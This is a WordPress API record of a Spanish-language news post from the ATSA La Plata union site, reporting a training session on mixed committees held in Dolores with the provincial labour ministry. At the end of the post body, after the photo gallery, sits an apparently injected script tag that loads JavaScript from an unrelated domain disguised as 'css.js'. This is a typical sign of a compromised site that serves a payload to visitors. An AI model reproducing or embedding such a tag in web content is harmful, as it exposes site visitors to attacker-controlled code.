{"id":19690,"date":"2025-10-17T10:24:33","date_gmt":"2025-10-17T13:24:33","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=19690"},"modified":"2026-02-02T16:25:58","modified_gmt":"2026-02-02T19:25:58","slug":"atsa-la-plata-participo-de-una-capacitacion-sobre-comites-mixtos-en-dolores","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/10\/atsa-la-plata-participo-de-una-capacitacion-sobre-comites-mixtos-en-dolores\/","title":{"rendered":"ATSA La Plata particip\u00f3 de una capacitaci\u00f3n sobre Comit\u00e9s Mixtos en Dolores"},"content":{"rendered":"\n<p><a><\/a>En el marco de la conformaci\u00f3n de los Comit\u00e9s Mixtos que viene realizando Sanidad ATSA La Plata junto al Licenciado Walter Rossi Bouvier, en la localidad de Dolores a trav\u00e9s de nuestro referente el compa\u00f1ero Horacio Sotelo, se organiz\u00f3 una capacitaci\u00f3n junto al Ministerio de Trabajo de la Provincia de Buenos Aires, donde se abordaron diversos temas relacionados con su implementaci\u00f3n.<\/p>\n\n\n\n<p>En la jornada estuvieron presentes adem\u00e1s Alberto Argel, delegado del Ministerio en Dolores; Sergio S\u00e1nchez, coordinador general y responsable del \u00e1rea; Sim\u00f3n Rossi, asesor legal; y representantes gremiales de toda la regi\u00f3n.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/hashtag\/siemprejuntoavos?__eep__=6&amp;__cft__[0]=AZXzoC6460h9dnbQdcJxh1LQNKzuqdV0AxI939qiH4lXLRPQ1stfWSzHyjgV-cbm5WJq2osuk_QwbL3e-wVf17E614Q0DAzWbfhWVMvR-0wV1t6Ag-TNpfa8MQm6tdr4HuBaR0R01C5tMW3h5tRvAfkURIYP28OwD2HoaRDzYGTma5lDLvmv80D0li6W8iNdPhU&amp;__tn__=*NK-R\">#SiempreJuntoAVos<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/sanidadatsalaplata?__eep__=6&amp;__cft__[0]=AZXzoC6460h9dnbQdcJxh1LQNKzuqdV0AxI939qiH4lXLRPQ1stfWSzHyjgV-cbm5WJq2osuk_QwbL3e-wVf17E614Q0DAzWbfhWVMvR-0wV1t6Ag-TNpfa8MQm6tdr4HuBaR0R01C5tMW3h5tRvAfkURIYP28OwD2HoaRDzYGTma5lDLvmv80D0li6W8iNdPhU&amp;__tn__=*NK-R\">#SanidadATSALaPlata<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/comit%C3%A9smixto?__eep__=6&amp;__cft__[0]=AZXzoC6460h9dnbQdcJxh1LQNKzuqdV0AxI939qiH4lXLRPQ1stfWSzHyjgV-cbm5WJq2osuk_QwbL3e-wVf17E614Q0DAzWbfhWVMvR-0wV1t6Ag-TNpfa8MQm6tdr4HuBaR0R01C5tMW3h5tRvAfkURIYP28OwD2HoaRDzYGTma5lDLvmv80D0li6W8iNdPhU&amp;__tn__=*NK-R\">#Comit\u00e9sMixto<\/a><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"19691\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/10\/562126797_1280130567489744_999575139498337289_n.jpg\" alt=\"\" class=\"wp-image-19691\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"19692\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/10\/562352213_1280130564156411_3613377632505004285_n.jpg\" alt=\"\" class=\"wp-image-19692\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/10\/562352213_1280130564156411_3613377632505004285_n.jpg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/10\/562352213_1280130564156411_3613377632505004285_n-768x768.jpg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/10\/562352213_1280130564156411_3613377632505004285_n-1024x1024.jpg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n<\/figure>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de la conformaci\u00f3n de los Comit\u00e9s Mixtos que viene realizando Sanidad ATSA&#8230;<\/p>\n","protected":false},"author":2,"featured_media":19691,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[87,146,98,88,81,85,96,148],"tags":[],"class_list":["post-19690","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-convenios","category-destacado","category-home","category-obra-social","category-salud","category-sec-de-prensa","category-sec-gremial","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/19690","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=19690"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/19690\/revisions"}],"predecessor-version":[{"id":20668,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/19690\/revisions\/20668"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/19691"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=19690"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=19690"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=19690"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}